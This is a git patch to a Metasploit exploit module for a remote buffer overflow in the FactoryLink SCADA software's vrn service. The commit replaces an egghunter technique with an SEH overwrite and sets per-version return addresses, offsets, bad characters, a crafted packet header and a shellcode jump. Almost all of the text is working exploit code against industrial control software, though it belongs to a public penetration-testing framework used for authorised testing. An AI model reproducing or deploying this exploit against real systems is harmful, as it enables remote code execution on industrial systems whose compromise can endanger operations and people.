From 1b25cf3c43bf183e609b639ec91faa01da63cfaa Mon Sep 17 00:00:00 2001 From: Wei Chen Date: Sun, 26 Jun 2011 19:28:14 +0000 Subject: [PATCH] Using SEH instead of egghunter. Verified again on Win2k3. thx to MC. git-svn-id: file:///home/svn/framework3/trunk@13036 4d416f70-5f16-0410-b530-b9f4589650da --- .../windows/scada/factorylink_vrn_09.rb | 74 +++++++++---------- 1 file changed, 34 insertions(+), 40 deletions(-) diff --git a/modules/exploits/windows/scada/factorylink_vrn_09.rb b/modules/exploits/windows/scada/factorylink_vrn_09.rb index c979e43576..aafae358e5 100644 --- a/modules/exploits/windows/scada/factorylink_vrn_09.rb +++ b/modules/exploits/windows/scada/factorylink_vrn_09.rb @@ -15,7 +15,7 @@ class Metasploit3 < Msf::Exploit::Remote Rank = AverageRanking include Msf::Exploit::Remote::Tcp - include Msf::Exploit::Remote::Egghunter + include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, @@ -30,7 +30,8 @@ class Metasploit3 < Msf::Exploit::Remote 'Author' => [ 'Luigi Auriemma', # Public exploit - 'hal' # Metasploit module + 'hal', # Metasploit module + 'MC', # SEH, badchars, etc ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', @@ -42,60 +43,53 @@ class Metasploit3 < Msf::Exploit::Remote 'Privileged' => true, 'DefaultOptions' => { - 'EXITFUNC' => 'process', + 'EXITFUNC' => 'seh', }, 'Payload' => { - 'Space' => 885, - 'BadChars' => "\x00", + 'Space' => 550, + 'BadChars' => "\x00\x20\x0a\x0d", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ - [ 'FactoryLink 7.5', { 'Ret' => 0x1c0106ac, 'padding' => 0 } ], - [ 'FactoryLink 7.5 SP2', { 'Ret' => 0x1c01069c, 'padding' => 0 } ], - [ 'FactoryLink 8.0.1.703', { 'Ret' => 0x1c01087c, 'padding' => 4 } ], + [ 'FactoryLink 7.5', { 'Ret' => 0x1c0106ac, 'Offset' => 994 } ], + [ 'FactoryLink 7.5 SP2', { 'Ret' => 0x1c01069c, 'Offset' => 994 } ], + [ 'FactoryLink 8.0.1.703', { 'Ret' => 0x1c01087c, 'Offset' => 998 } ], ], - 'DefaultTarget' => 0, 'DisclosureDate' => 'Mar 21 2011')) - register_options([Opt::RPORT(7579)], self.class) + register_options([Opt::RPORT(7579)], self.class) end def exploit + + header = "\x3f" * 4 + header << "\xff\x55" + header << "\x09\x00" # opcode + header << "\x3f\x3f\xff\xff" + header << "\x00\x00\x3f\x3f" + header << "\x01\x00" + header << "\x3f" * 16 + header << "\x01\x00\x01\x00" + header << "\x3f\x3f" + + data = rand_text_alpha_upper(65535) + data[448, payload.encoded.length] = payload.encoded + data[target['Offset'], 8] = generate_seh_record(target.ret) + data[1006, 5] = Metasm::Shellcode.assemble(Metasm::Ia32.new, "call $-524").encode_string + + print_status("Trying target #{target.name}...") + connect - - #The use of egghunter seems appropriate due to the small buffer in [ESP+8] - hunter = generate_egghunter(payload.encoded, payload_badchars, - { :checksum => true, :startreg => 'ebp'}) - - egg = hunter[1] - - header = "\x3f\x3f\x3f\x3f" - header << "\xff\x55" - header << "\x09\x00" - header << "\x3f\x3f\xff\xff\x00\x00\x3f\x3f" - header << "\x01\x00\x3f\x3f\x3f\x3f\x3f\x3f" - header << "\x3f\x3f\x3f\x3f\x3f\x3f\x3f\x3f" - header << "\x3f\x3f" - header << "\xff\xff\xff\xff" - header << "\x3f\x3f" - - request = header - request << rand_text_alpha_upper(100) - request << egg - request << rand_text_alpha(target['padding']) - request << "\xeb\x06\x90\x90" - request << [target.ret].pack('V') - request << make_nops(24) - request << hunter[0] - request << rand_text_alpha_upper(100000) - - print_status("Trying target #{target.name} with #{request.size} bytes") - sock.put(request) - + sock.put(header + data) + handler + + select(nil,nil,nil,1) disconnect + end + end